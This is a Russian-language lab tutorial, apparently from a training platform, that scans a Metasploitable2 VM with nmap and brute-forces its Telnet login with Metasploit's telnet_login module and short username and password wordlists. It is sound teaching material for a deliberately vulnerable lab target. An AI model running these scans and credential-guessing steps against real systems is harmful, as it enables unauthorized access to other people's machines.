Введение
В этом лабораторном занятии мы научимся эксплуатировать уязвимость сервиса Telnet и провести пенетрационный атаку. Сценарий предполагает использование машины с Kali Linux в качестве атакующей машины и виртуальной машины Metasploitable2 в качестве целевой машины. Цель состоит в том, чтобы выполнить сканирование целевой машины на предмет уязвимостей, выявить уязвимость сервиса Telnet и эксплуатировать ее с использованием фреймворка Metasploit.
Запустите лабораторную среду
На этом шаге мы запустим лабораторную среду, которая включает в себя контейнер Kali Linux и виртуальную машину Metasploitable2.
- Откройте терминал xfce на хост - машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:
sudo virsh start Metasploitable2
Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.
- Проверьте связь с целевой машиной, отправив ей пинг:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить пинг.
- Запустите контейнер Kali Linux и войдите в среду bash, выполнив следующую команду:
docker run -ti --network host b5b709a49cd5 bash
- Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить пинг.
Теперь как атакующая, так и целевая машины запущены, и вы можете приступить к пенетрационному тестированию.
Примечание: Если вы случайно выйдете из текущей оболочки bash, контейнер Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash на хост - машине, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.
Провести сканирование на уязвимости
На этом шаге мы используем Nmap для сканирования целевой машины на предмет открытых портов и сервисов.
Сначала запустите базу данных PostgreSQL, так как Metasploit требует ее для хранения данных:
service postgresql start
msfdb init
cd ~
msfconsole
В консоли Metasploit выполните сканирование Nmap на целевой машине:
nmap -sV -T4 192.168.122.102
Опция -sV сканирует открытые порты и показывает подробную информацию о портах, а опция -T4 задает политику времени сканирования (от 0 до 5, более высокие значения обеспечивают более быстрый, но более шумный скан).
Проанализируйте результаты сканирования
На этом шаге мы проанализируем результаты сканирования Nmap, чтобы выявить уязвимый сервис Telnet.
Вывод сканирования Nmap показывает, что сервис Telnet работает на порту 23 с баннером "Linux telnetd". Давайте найдем соответствующий модуль Metasploit:
search scanner/telnet
Используем модуль auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Покажем параметры модуля:
show options
Обязательным параметром является RHOSTS, который задает целевой(ые) хост(ы).
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Подготовьте словарь имен пользователей и паролей
На этом шаге мы подготовим файлы словарей имен пользователей и паролей для атаки методом перебора (брутфорс - атаки) при входе в систему.
Откройте новый терминал и подключитесь к контейнеру Kali:
docker run -ti --network host b5b709a49cd5 bash
Создайте файл username.txt в директории / со следующими именами пользователей:
123456
admin
msfadmin
root
kali
Создайте еще один файл password.txt в директории / со следующими паролями:
abc123
1234
123456
root
msfadmin
admin
toor
Эти файлы будут использоваться в качестве словарей имен пользователей и паролей для атаки методом перебора.
Настройте модуль Metasploit
На этом шаге мы настроим модуль Metasploit с указанием целевого хоста, словаря имен пользователей и словаря паролей.
Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить ее:
cd ~
msfconsole
Используйте модуль auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Установите целевой хост:
set RHOSTS 192.168.122.102
Установите файл словаря имен пользователей:
set USER_FILE /username.txt
Установите файл словаря паролей:
set PASS_FILE /password.txt
Наконец, запустите эксплойт:
exploit
Metasploit начнет пробовать различные комбинации имен пользователей и паролей из предоставленных словарей. Если будет найдена действительная учетная запись, она будет отображена зеленым цветом.
В данном случае действительная учетная запись - msfadmin/msfadmin.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Резюме
В этом практическом занятии мы научились эксплуатировать уязвимость сервиса Telnet с использованием фреймворка Metasploit. Мы начали с настройки лабораторной среды с использованием машины - атакующего на базе Kali Linux и целевой машины Metasploitable2. Затем мы выполнили сканирование на уязвимости с помощью Nmap, чтобы определить запущенный сервис Telnet. Далее мы подготовили словари имен пользователей и паролей и настроили модуль Metasploit с указанием целевого хоста и файлов словарей. Наконец, мы запустили эксплойт и успешно перебрали учетные данные для входа в Telnet.
В этом практическом занятии мы получили практический опыт в проведении пен - тестирования, сканировании на уязвимости и использовании фреймворка Metasploit для эксплоитации уязвимостей. Это показало важность безопасных практик использования паролей и потенциальные риски использования слабых или легко угадываемых учетных данных.
